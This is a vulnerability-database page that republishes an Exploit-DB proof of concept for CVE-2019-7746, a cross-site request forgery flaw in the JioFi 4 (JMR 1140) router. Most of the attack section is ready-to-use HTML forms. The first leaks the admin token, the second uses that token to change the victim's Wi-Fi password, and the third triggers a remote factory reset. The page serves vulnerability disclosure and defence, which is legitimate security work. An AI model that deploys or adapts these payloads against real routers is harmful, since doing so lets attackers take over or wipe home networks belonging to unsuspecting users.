Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)

🗓️ 13 Feb 2019 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 137 Views

Jiofi 4 (JMR 1140) CSRF exploit allows leaked admin tokens for WiFi password change or factory rese

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - CSRF (Admin Token Disclosure) Vulnerability
13 Feb 201900:00
zdt
CVE		CVE-2019-7746
7 May 201918:59
cve
Cvelist		CVE-2019-7746
7 May 201918:59
cvelist
EUVD		EUVD-2019-17274
7 Oct 202500:30
euvd
NVD		CVE-2019-7746
7 May 201919:29
nvd
OSV		CVE-2019-7746
7 May 201919:29
osv
Prion		Cross site request forgery (csrf)
7 May 201919:29
prion
RedhatCVE		CVE-2019-7746
22 May 202505:25
redhatcve
# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router	
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7746

Description:

JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a  /cgi-bin/qcmap_auth type=getuser request and then reading the token  field. This token value can then be used to change the Wi-Fi password or perform a factory reset.

POC-

The exploit requires two csrf requests to be sent to the victim(logged to  the web interface) connected to the Jiofi router.

1. First get admin tokens 

<html>
    <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
      <input type="hidden" name="type" value="getuser" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


  Example response-

{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}

Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="SetWiFi&#95;Setting" />
      <input type="hidden" name="Mask" value="0" />
      <input type="hidden" name="result" value="0" />
      <input type="hidden" name="ssid" value="JioFi4&#95;08FE5F" />
      <input type="hidden" name="mode&#95;802&#95;11" value="11bgn" />
      <input type="hidden" name="tx&#95;power" value="HIGH" />
      <input type="hidden" name="wmm" value="Enable" />
      <input type="hidden" name="wps&#95;enable" value="PushButton" />
      <input type="hidden" name="wifi&#95;security" value="WPA2PSK" />
      <input type="hidden" name="wpa&#95;encryption&#95;type" value="AES" />
      <input type="hidden" name="wpa&#95;security&#95;key" value="Iamhacked" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;1" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;2" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;3" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;4" value="0" />
      <input type="hidden" name="wep&#95;current&#95;default&#95;key" value="0" />
      <input type="hidden" name="channel&#95;mode" value="automatic" />
      <input type="hidden" name="channel&#95;selection" value="11" />
      <input type="hidden" name="sleep&#95;mode" value="Enable" />
      <input type="hidden" name="sleep&#95;mode&#95;timer" value="30" />
      <input type="hidden" name="ssid&#95;broadcast" value="Enable" />
      <input type="hidden" name="enable&#95;wifi" value="Enable" />
      <input type="hidden" name="token" value="leakedtokens" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Wifi Password changed to Iamhacked

Choice B) Perform Remote Factory Reset

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="type" value="FRST&#95;REAL" />
      <input type="hidden" name="token" value="leakedtokens" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The router reboots to default settings.


Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Feb 2019 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 24.3
CVSS 38.1
EPSS0.0032
jiofi 4jmr 1140csrfadmin tokenswifi passwordfactory reset
137